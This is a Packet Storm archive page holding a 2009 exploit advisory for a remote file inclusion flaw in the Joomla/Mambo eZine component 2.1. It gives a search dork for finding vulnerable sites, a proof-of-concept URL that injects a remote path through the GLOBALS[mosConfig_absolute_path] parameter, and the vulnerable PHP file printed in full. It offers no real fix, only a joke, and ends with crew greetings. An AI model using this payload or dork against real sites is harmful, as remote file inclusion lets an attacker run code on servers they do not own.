we care because you do

Joomla / Mambo Ezine Remote File Inclusion

Joomla / Mambo Ezine Remote File Inclusion
Posted Nov 18, 2009
Authored by kaMtiEz | Site indonesiancoder.com

The Joomla / Mambo Ezine component version 2.1 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion
MD5 | 9f22a9da5863a09bef099aa1cc67a7fe

Joomla / Mambo Ezine Remote File Inclusion

Change Mirror Download
#####################################################################################################
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : October 20 2009 ##
#####################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#####################################################################################################

[ Software Information ]

[+] Vendor : http://designformamb0.c0m
[+] Download : -
[+] version : 2.1
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_ezine"
[+] Location : INDONESIA

[DESCRIPTION]

/**
* eZine component v2.1
*
* @copyright Nguyen Manh Cuong
* Author`s email : cu0ngnm@designformamb0.c0m
* Author`s hompage : http://designformamb0.c0m
*
* @license Commercial Product - Single Site License or Free to Use with Limitation
**/

###############################################

[ PoC ]

http://127.0.0.1/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]

[ Bugs File ]

[+] d4m_ajax_pagenav.php

<?php
// Extend mosPageNav class
require_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/pageNavigation.php' );
// Define new Page Navigation class
class ajaxPageNav extends mosPageNav {
// Rewrite writePagesLinks() function to build ajax friendly URL
function writeAjaxLinks( $link ) {
$txt = '';

$displayed_pages = 10;
$total_pages = ceil( $this->total / $this->limit );
$this_page = ceil( ($this->limitstart+1) / $this->limit );
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;
if ($start_loop + $displayed_pages - 1 < $total_pages) {
$stop_loop = $start_loop + $displayed_pages - 1;
} else {
$stop_loop = $total_pages;
}

if ($this_page > 1) {
$page = ($this_page - 2) * $this->limit;
$txt .= '<a href="'. str_replace('%LIMITSTART%', 0, $link) .'" class="pagenav" title="first page"><< '. _PN_START .'</a> ';
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .'" class="pagenav" title="previous page">< '. _PN_PREVIOUS .'</a> ';
} else {
$txt .= '<span class="pagenav"><< '. _PN_START .'</span> ';
$txt .= '<span class="pagenav">< '. _PN_PREVIOUS .'</span> ';
}

for ($i=$start_loop; $i <= $stop_loop; $i++) {
$page = ($i - 1) * $this->limit;
if ($i == $this_page) {
$txt .= '<span class="pagenav">'. $i .'</span> ';
} else {
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .'" class="pagenav"><strong>'. $i .'</strong></a> ';
}
}

if ($this_page < $total_pages) {
$page = $this_page * $this->limit;
$end_page = ($total_pages-1) * $this->limit;
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .' " class="pagenav" title="next page">'. _PN_NEXT .' ></a> ';
$txt .= '<a href="'. str_replace('%LIMITSTART%', $end_page, $link) .' " class="pagenav" title="end page">'. _PN_END .' >></a>';
} else {
$txt .= '<span class="pagenav">'. _PN_NEXT .' ></span> ';
$txt .= '<span class="pagenav">'. _PN_END .' >></span>';
}
return $txt;
}
}
?>

[ FIX ]

Tukulesto said : talk to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae

Joke.. ;)
###############################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh
[+] makasih buat om tukulesto buat perl exploit nye .. huahhh
[+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha
[+] om tukulesto kutunggu kau di kotaku .. :D

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    11 Files
  • 27
    May 27th
    8 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close